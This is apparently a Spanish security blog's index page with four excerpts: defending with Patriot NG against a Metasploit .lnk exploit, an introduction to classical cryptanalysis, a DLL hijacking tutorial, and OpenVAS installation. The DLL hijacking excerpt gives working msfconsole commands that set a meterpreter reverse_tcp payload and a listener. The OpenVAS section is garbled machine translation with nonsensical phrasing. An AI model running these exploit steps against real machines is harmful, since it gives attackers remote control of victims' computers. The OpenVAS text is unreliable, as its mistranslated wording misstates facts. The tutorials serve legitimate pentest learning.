Patriot NG 1.0 para defendernos de un ataque con Metasploit

Si ayer nuestro compañero Yago presentaba la versión 1.0 de Patriot NG, ahora os enseñamos como gracias a este programa podemos detectar y mitigar un ataque mediante un exploit que, en este caso, vamos a lanzar desde Metasploit Framework.
El exploit que usaremos va a ser windows/browser/ms10_046_shortcut_icon_dllloader(el fallo de los .lnk), el cual vamos a explotar a través de Internet Explorer. Como payload usaremos windows/shell_reverse_tcp para obtener el control del equipo remoto mediante consola de comandos.
Metasploit abrirá un puerto, al que conectaremos con IE. La configuración es la siguiente:

Introduccion a Criptoanalisis.

Este paper se me ocurrio escribirlo cuando encontre por internet un reto que planteaba el FBI, el cual se cifraba un determinado mensaje, con un algoritmo clasico. Ademas de que tambien he visto un reto similar llamado Crypto Badness el cual fue usado para la clasificacion de CTF en la DefCon.

Antes de comenzar me gustaria introducir sobre el Criptoanalisis, algo muy breve, aunque ya he escrito una introduccion a lo que respecta la Criptografia y sus comienzos en [http://confused.vndv.com/?cat=15].

Introduccion a Criptoanalisis: El criptoanalisis es un poco de ingenio y metodos de estudio, que se puede emplear ante un ‘texto cifrado’ para intentar obtener dicha informacion sin acceso. Podemos decir que es la forma de romper un codigo o sortear la seguridad.

El criptoanalisis clasico, en el cual me voy a basar en este paper, surgio aproximadamente por el siglo IX, X, el cual tomo mayor valor cuando un arabe llamado Sabbah Al-kindi, expuso en un manuscrito varias formas de descifrar mensajes criptograficos. Una de esos metodos se lo conoce como el Análisis de Frecuencias.

El Análisis de Frecuencia: Es una de los metodos criptograficos mas clasicos. Hay algo que tienen en comun muchos idiomas, muchos lenguajes, y es que estadisticamente, dependiendo cual sea este, ciertas letras del abecedario se repiten o tienen una frecuencia mayor que otras.

Leer más

DLL Hijacking con Metasploit

Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los  sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.

 

Abrimos metasplit

rokitoh@red-orbita# msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»
EXTENSIONS => grp p7c vcf wab
msf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111
lhost => 192.168.1.111
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.111:4444
[*]
[*] Exploit links are now available at \192.168.1.111documents
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.111:80/

 

 

Leer más

Instalar OpenVAS 3.1 en Debian Lenny


¿Que es OpenVAS?

OpenVAS (Explorador del gravamen de la vulnerabilidad de OpenSource), previamente GNessUs, es a GLP bifurcación del Nessus explorador de la seguridad para no prohibir a futuro el desarrollo libre de la herramienta ahora-propietaria.

OpenVAS fue propuesto originalmente cerca pentesters en Seguridad de la computadora de Portcullis y entonces anunciado por Tim Brown encendidoSlashdot. OpenVAS es un proyecto del miembro de Software en el interés público[1]. Previamente, había sido votado hacia fuera porque el proyecto aparecía ser muerto.[2] Los dominios de OpenVAS fueron donados por SecuritySpace, el recibimiento fue donado por la Nth dimensión/el Internet público y los honorarios de conferencia de DevCon 1 eran pagados para cerca Intevation y Sistemas del DN.

Leer más